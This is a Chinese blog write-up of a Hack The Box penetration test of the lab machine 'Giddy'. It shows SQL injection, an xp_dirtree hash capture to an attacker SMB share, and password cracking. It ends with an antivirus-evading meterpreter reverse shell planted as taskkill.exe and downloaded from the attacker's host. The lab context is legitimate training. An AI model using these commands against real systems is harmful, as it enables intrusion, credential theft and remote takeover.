官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

Web安全

^{0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
90
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9}

HTB：Giddy渗透测试

HBXQ 2021-06-10 01:37:37 129690

基础信息

简介：Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能，平台环境都是模拟的真实环境，有助于自己更好的适应在真实环境的渗透。
链接：https://www.hackthebox.eu/home/machines/profile/153
描述：图片.png

前言

本次演练使用kali系统按照渗透测试的过程进行操作，在渗透前期通过信息收集获取到相应的目录，发现存在SQL注入，知道了使用了mssql数据库，通过xp_dirtree函数获取hash，获取到账号与密码最终通过提权获取到root权限。

一、信息收集

1、靶机ip

IP地址为：10.10.10.104
图片.png

2、靶机端口与服务

nmap -sT -sV -O -A 10.10.10.104

图片.png

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services

2、网站信息收集

(1)查看80端口与443端口收集网站信息
发现都是同一张图片
图片.png

将图片拷贝下来使用steghide查看是否存在隐写

steghide extract -sf giddy.jpg

该图片不存在隐写
图片.png (2)目录扫描

python3 dirsearch.py  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.104/

这里只列出了对本次渗透有用的目录
图片.png

/mvc 
/remote

二、漏洞探测与利用

1、SQL注入

访问/mvc目录
这是一个商品列表点击之后会显示价格
图片.png
看见这个url感觉可能存在SQL注入加一个'测试一下
报错使用sqlmap跑一下看看能否获取一些信息
通过sqlmap扫描得知使用的是mssql数据库已知该数据库存在堆叠注入，并且该数据库正在以DBMS运行着
可以使用 impacket-smbserver，通过xpdirtree函数连接到该服务获取到相应的哈希，最后使用john破解hash

impacket-smbserver xb $(pwd)
;exec xp_dirtree '\\10.10.14.8\xb';--
john --wordlist /usr/share/wordlists/rockyou.txt hash

图片.png 用户：GIDDY\Stacy
密码：xNnWo6272k7x

2、获取shell

查看/remote目录，这是一个登陆界面，可以使用获取到的密码账号尝试登陆，但是提示说我们是需要使用https进行登录
图片.png 更换到https进行登录

三、提权

1、获取user.txt

登录之后发现这是一个powershell窗口可以运行命令
获取user.txt
图片.png

2、提权

通过信息收集得知系统运行了unifivideo服务
图片.png 通过谷歌得知这是一个视频监控服务
使用searchsploit查询可利用脚本
通过叙述可知在关闭开启该服务的时候会访问taskkill.exe，可以创建一个taskkill.exe上传到该目录下，反弹shell
由于存在防病毒模块我们需要对给模块进行绕过，使用[Phantom-Evasion](https://github.com/oddcod3/Phantom-Evasion)进行生成，这是一个个人感觉不错的工具
注：之前上传的被杀掉这里直接演示成功绕过的

python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 10.10.14.8 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o taskkill.exe

图片.png 本地开放8001端口,让taskkill.exe上传到靶机中

python3 -m http.server 8001
Invoke-WebRequest -o taskkill.exe http://10.10.14.8:8001/taskkill.exe

一切准备就绪，使用msf监听端口
图片.png

use exploit/multi/handler
set payload  windows/meterpreter/reverse_tcp 
set LHOST 10.10.14.8
exploit

关闭开启Ubiquiti UniFi Video服务

Stop-Service "Ubiquiti UniFi Video"
start-service unifivideoservice

成功获取到shell
图片.png 查看权限发现是系统权限

3、获取root.txt

图片.png

# 渗透测试 # web安全

免责声明

1.一般免责声明：本文所提供的技术信息仅供参考，不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》，作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明：文中技术内容可能不适用于所有情况或系统，在实际应用前请充分测试和评估。若因使用不当造成的任何问题，相关方不承担责任。

3. 更新声明：技术发展迅速，文章内容可能存在滞后性。读者需自行判断信息的时效性，因依据过时内容产生的后果，作者及发布平台不承担责任。

本文为 HBXQ 独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多